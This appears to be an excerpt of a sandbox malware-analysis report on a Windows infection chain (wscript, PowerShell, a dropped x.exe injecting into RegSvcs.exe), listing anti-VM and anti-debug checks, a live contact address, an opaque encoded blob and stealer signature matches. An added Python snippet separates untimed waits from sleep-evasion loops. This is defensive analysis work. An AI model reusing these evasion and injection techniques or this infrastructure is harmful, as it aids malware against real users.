              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time (50 consecutive calls, listed in order): 600000, 599874, 599740, 599624, 599515, 599406, 599293, 599187, 599078, 598968, 598859, 598749, 598640, 598531, 598421, 598310, 598203, 598093, 597976, 597874, 597765, 597656, 597546, 597437, 597328, 597218, 597109, 596999, 596890, 596781, 596671, 596562, 596453, 596343, 596234, 596124, 596015, 595906, 595796, 595687, 595577, 595468, 595359, 595249, 595140, 595031, 594921, 594812, 594703, 594593
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3461
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2719
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1257
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 8601
              Source: C:\Users\user\AppData\Local\Temp\x.exe Evaded block: after key decision (graph_5-86820)
              Source: C:\Users\user\AppData\Local\Temp\x.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_5-87682)
              Source: C:\Users\user\AppData\Local\Temp\x.exe API coverage: 3.6 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1108 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200 Thread sleep time: -922337203685477s >= -30000s
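              Before reading the "Thread delayed" and "Thread sleep time" entries as deliberate evasion, two of the numbers deserve a second look. 922337203685477 ms is 2^63 hundred-nanosecond ticks converted to milliseconds, which is almost certainly how a wait with no timeout appears after unit conversion rather than a sleep the sample chose; the powershell total of -2767011611056431 s is exactly three of them. The RegSvcs.exe run from 600000 down to 594593 in steps of about 109 ms, on the other hand, is the signature of a loop that keeps sleeping for the time still left until a deadline, with each iteration returning after roughly 109 ms of real time, consistent with a sandbox shortening sleeps while the sample re-sleeps the remainder. The Python below is an added example, not from the report or the sample: it parses lines in the report's format and separates those two cases. The delay values are the ones listed above; the executable paths in the sample lines are shortened.

```python
"""Added example: not from the Joe Sandbox report or the sample.

Separates two patterns in 'Thread delayed' / 'Thread sleep time' entries:
  * 922337203685477 ms is 2**63 hundred-nanosecond ticks in milliseconds, the
    value a wait with no timeout takes after unit conversion; a per-thread
    total of -2767011611056431 s is exactly three such waits.
  * a run of strictly decreasing delays a few hundred ms apart is a loop that
    re-sleeps 'deadline minus elapsed'; the step size is the real time each
    iteration took before the sleep returned.
The delay values are the ones listed in the report; the line prefix is
shortened for the example.
"""
import re
import statistics

INFINITE_WAIT_MS = 2**63 // 10_000          # 922337203685477
DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")


def parse_delays(lines):
    """Pull the millisecond delay out of every 'Thread delayed' line, in order."""
    return [int(m.group(1)) for ln in lines if (m := DELAY_RE.search(ln))]


def infinite_wait_count(total_ms: int):
    """Number of no-timeout waits a per-thread sleep total represents, or None."""
    total_ms = abs(total_ms)
    return total_ms // INFINITE_WAIT_MS if total_ms % INFINITE_WAIT_MS == 0 else None


def find_chains(delays, max_step_ms=1000, min_len=5):
    """Group consecutive, strictly decreasing delays into remaining-time chains."""
    chains, cur = [], []
    for d in delays:
        if cur and 0 < cur[-1] - d <= max_step_ms:
            cur.append(d)
        else:
            if len(cur) >= min_len:
                chains.append(cur)
            cur = [d]
    if len(cur) >= min_len:
        chains.append(cur)
    return chains


def summarize(lines):
    """Count infinite waits and describe each re-sleep chain found in the lines."""
    delays = parse_delays(lines)
    chains = []
    for c in find_chains(delays):
        steps = [a - b for a, b in zip(c, c[1:])]
        chains.append({
            "start_ms": c[0],
            "end_ms": c[-1],
            "iterations": len(c),
            "median_step_ms": statistics.median(steps),   # real time per iteration
            "real_time_elapsed_ms": c[0] - c[-1],
        })
    return {"infinite_waits": delays.count(INFINITE_WAIT_MS), "chains": chains}


# The RegSvcs.exe delay sequence as listed in the report (50 values).
REGSVCS_CHAIN = [
    600000, 599874, 599740, 599624, 599515, 599406, 599293, 599187, 599078, 598968,
    598859, 598749, 598640, 598531, 598421, 598310, 598203, 598093, 597976, 597874,
    597765, 597656, 597546, 597437, 597328, 597218, 597109, 596999, 596890, 596781,
    596671, 596562, 596453, 596343, 596234, 596124, 596015, 595906, 595796, 595687,
    595577, 595468, 595359, 595249, 595140, 595031, 594921, 594812, 594703, 594593,
]

# Report entries, with the full executable paths shortened.
SAMPLE_LINES = (
    ["Source: powershell.exe Thread delayed: delay time: 922337203685477"] * 2
    + ["Source: RegSvcs.exe Thread delayed: delay time: 922337203685477"]
    + [f"Source: RegSvcs.exe Thread delayed: delay time: {v}" for v in REGSVCS_CHAIN]
)

if __name__ == "__main__":
    print(summarize(SAMPLE_LINES))
    print(infinite_wait_count(-2767011611056431))   # 3
```

              On this report the chain summary comes out as 50 iterations from 600000 ms to 594593 ms with a median step of 109 ms, i.e. about 5.4 s of real time spent inside a sleep loop that believed it was waiting ten minutes. That is the entry worth keeping as an evasion indicator; the 922337203685477 values are untimed waits and appear in plenty of benign .NET and PowerShell processes.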
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0045DE8F FindFirstFileW,FindClose
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
              Source: RegSvcs.exe, 00000006.00000002.2887524458.0000000003182000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
              Source: RegSvcs.exe, 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: vmware
              Source: x.exe, 00000005.00000002.1725663562.00000000009EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: wscript.exe, 00000001.00000002.1775167248.000001B50AAF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1769036659.000001B50AAEC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
              Source: RegSvcs.exe, 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
              Source: wscript.exe, 00000001.00000003.1773587473.000001B50CE18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1775625595.000001B50CE18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1775167248.000001B50AAF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1769036659.000001B50AAEC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: x.exe, 00000005.00000002.1725663562.00000000009EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000001.00000003.1772298991.000001B50D4A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
              Source: wscript.exe, 00000001.00000003.1772213310.000001B50D6A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [long opaque base64-like string omitted, same content as the previous entry]
              Source: x.exe, 00000005.00000002.1728264547.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareworkstation.exe
              Source: RegSvcs.exe, 00000006.00000002.2900238221.00000000059EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\x.exe API call chain: ExitProcess graph end node
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API call chain: ExitProcess graph end node
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_057011F8 CheckRemoteDebuggerPresent
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0045A370 BlockInput
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0040EBD0 LoadLibraryA,GetProcAddress
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_02F334C0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_02F33520 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_02F31E70 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0041F250 SetUnhandledExceptionFilter
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_004123F1 SetUnhandledExceptionFilter
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\System32\wscript.exe Network Connect: 108.181.20.35 443
              Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EC4008
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00436CD7 LogonUserW
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
              Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\x.exe"
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
              Source: x.exe Binary or memory string: Shell_TrayWnd
              Source: powershell.exe, 00000003.00000002.1741313249.00000244CBE44000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000000.1709542652.0000000000482000.00000002.00000001.01000000.00000008.sdmp, x.exe, 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: GetLocaleInfoA,6_2_00417A20
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_00472C3F GetUserNameW
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
              Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 5_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match File source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPE
